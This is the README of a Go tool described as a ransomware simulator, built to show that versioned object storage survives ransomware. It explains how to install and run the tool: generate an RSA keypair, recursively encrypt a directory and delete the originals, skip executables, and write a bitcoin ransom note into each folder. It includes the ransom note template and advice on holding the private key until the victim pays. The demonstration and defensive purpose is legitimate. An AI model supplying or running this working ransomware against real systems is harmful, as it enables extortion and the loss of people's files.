A simple demonstration tool to simulate a ransomware attack locally
This software is made just for demonstration and study purposes. If you want to run it locally for tests, take care of what directories you decide to encrypt. The software is distributed in MIT license. Its use is free, however the author doesn't take responsibility for any illegal use of the code by 3rd parties.
To setup the tool just run
go install github.com/marmos91/ransomware@latestTo run the tool locally without installing it
go run main.goIn order to demonstrate the way ransomware works quickly and in a protected environment, it is very useful to be able to restrict its operation within a directory. This way the process takes much less time (the entire operating system does not need to be encrypted). Writing this tool in Go, also allows the tool to be developed even in a non-Windows environment (by far the most supported operating system by ransomware available online)
This project was used to showcase the resilience of Cubbit's object storage to this type of attack, demonstrating how it is possible to defend against such a tool using. Cubbit's features (versioning, object locking).
The whole thing is available in a video demo that can be found here.
The restore tool used in the demo is available here.
This tool is used to simulate a ransomware attack. With it you can perform the following actions:
- After setting up a key, recursively encrypt the contents of a specified path
- After asking for a key, recursively decrypt the contents of a specified path
NAME:
ransomware - A simple demonstration tool to simulate a ransomware attack
USAGE:
ransomware [global options] command [command options] [arguments...]
VERSION:
v1.0.0
AUTHOR:
Marco Moschettini <marco.moschettini@cubbit.io>
COMMANDS:
create-keys, c Generates a new random keypair and saves it to a file
encrypt, e Encrypts a directory
decrypt, d Decrypts a directory
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--verbose Runs the tool in verbose mode (more logs) (default: false)
--help, -h show help (default: false)
--version, -v print the version (default: false)First thing you need to do is to create a keypair. You can do it by running
ransomware create-keys --path ~/DesktopIf you don't specifiy a path it will create the keys in pwd.
This command will create two files:
- pub.pem
- priv.pem
In a real scenario you need to put the private key in a server and provide it only after the victim payed the ransom. The public key needs instead to be embedded in the ransomware to encrypt the folders
With this command you can recursively encrypt every file inside a specified directory.
NAME:
ransomware encrypt - Encrypts a directory
USAGE:
ransomware encrypt [command options] [arguments...]
OPTIONS:
--path value, -p value Runs the tool on a directory
--publicKey value Loads the provided RSA public key in PEM format
--extBlacklist value the extension to blacklist (default: ".enc")
--extWhitelist value the extension to whitelist
--skipHidden skips hidden folders (default: false)
--dryRun encrypts files without deleting originals (default: false)
--encSuffix value defines the suffix to add to encrypted files (default: ".enc")
--addRansom if set to true add a ransom note to every encrypted folder (default: false)
--ransomTemplatePath value defines where to find the template to use for the ransom note
--ransomFileName value defines the name of the ransom file name (default: "IMPORTANT.txt")
--bitcoinCount value how many bitcoins to ask as ransom (default: 0)
--bitcoinAddress value the bitcoin address to use (default: "<bitcoin address>")
--help, -h show help (default: false)For example if you want to run the tool on the ~/Documents folder run:
ransomware encrypt --publicKey ./pub.pem --path ~/DocumentsThis command provides the following options:
path: the path to encrypt. This is requiredpublicKey: the path of the publicKey PEM file created by thecreate-keyscommandextBlacklist: if provided, a comma-separated list of extension to skip. This feature is useful, to exclude executable like.exefilesextWhitelist: if provided, a comma-separated list of extension to whitelistskipHidden: if set, skips hidden foldersdryRun: just creates encrypted files without deleting originalsencSuffix: defines a custom extension to set on encrypted files (default.enc)addRansom: if the tool should generate a new ransom.txt file for each encrypted folderransomTemplatePath: the path of the template to use as ransomransomFileName: the name to give to the ransom filebitcoinCount: how many bitcoin to ask as ransombitcoinAddress: the bitcoin address to use inside the ransom file
Just encrypt gif files on Desktop
ransomware encrypt --publicKey ./pub.pem --path ~/Desktop --extWhitelist .gifEncrypt everything except .csv and .pdf files
ransomware encrypt --publicKey ./pub.pem --path ~/Desktop --extBlacklist .csv,.pdfEncrypt everything and add a ransom file
ransomware encrypt --publicKey ./pub.pem --path ~/Desktop --addRansom --ransomTemplatePath ./ransom/IMPORTANT.txtThis is an example of ransom file. The templated strings {{.BitcoinAddress}}, {{.BitcoinCount}} and {{.PubliKey}} will be replace by the script. Please check encrypt options to see options available
!!! IMPORTANT !!!
All of your files are encrypted with RSA 4096 and AES 256 ciphers.
More information about RSA and AES can be found here:
- https://en.wikipedia.org/wiki/RSA_(cryptosystem)
- https://en.wikipedia.org/wiki/Advanced_Encryption_Standard
Decrypting of your files is only possible with the private key and decrypt program, which is not available to you.
To receive your private key please send {{.BitcoinCount}}BTC to {{.BitcoinAddress}} together with the public key used to encrypt your files
The public key to use in the form is
{{.PublicKey}}With this command you can decrypt a folder back to its original form after a victim payed the ransom
NAME:
ransomware decrypt - Decrypts a directory
USAGE:
ransomware decrypt [command options] [arguments...]
OPTIONS:
--path value, -c value Runs the tool on a directory
--privateKey value Loads the provided RSA private key in PEM format
--dryRun decrypts files without deleting encrypted versions (default: false)
--encSuffix value defines the suffix to add to encrypted files (default: ".enc")
--ransomFileName value defines the name of the ransom file name (default: "IMPORTANT.txt")
--help, -h show help (default: false)For example if you want to run the tool on the ~/Documents folder run:
ransomware decrypt --privateKey ./priv.pem --path ~/Desktop/toEncryptThis command provides the following options:
path: the path to encrypt. This is requiredprivateKey: the path of the privateKey PEM file created by thecreate-keyscommanddryRun: just creates decrypted files without deleting encrypted versionencSuffix: defines a custom extension for encrypted files (default.enc)ransomFileName: defines the name of the ransom file. Needed to delete the files previously generated
The tool implements a hybrid encryption strategy making use of two different algorithms:
The reason for this choice is related to the different nature of the two encryption algorithms. A hybrid approach takes advantage of the performance of AES to execute faster, while at the same time not providing the decryption key within the executable.
A new random AES key is then generated for the session each time the tool is executed. This key is used to encrypt all files in the selected folder. For later retrieval, this key is encrypted with the public RSA key provided to the tool and prepended to all encrypted files.
In this way, the tool, provided with the corresponding private key, will be able to read the AES key at the beginning of each file, decrypt it, and finally use it to decrypt the file.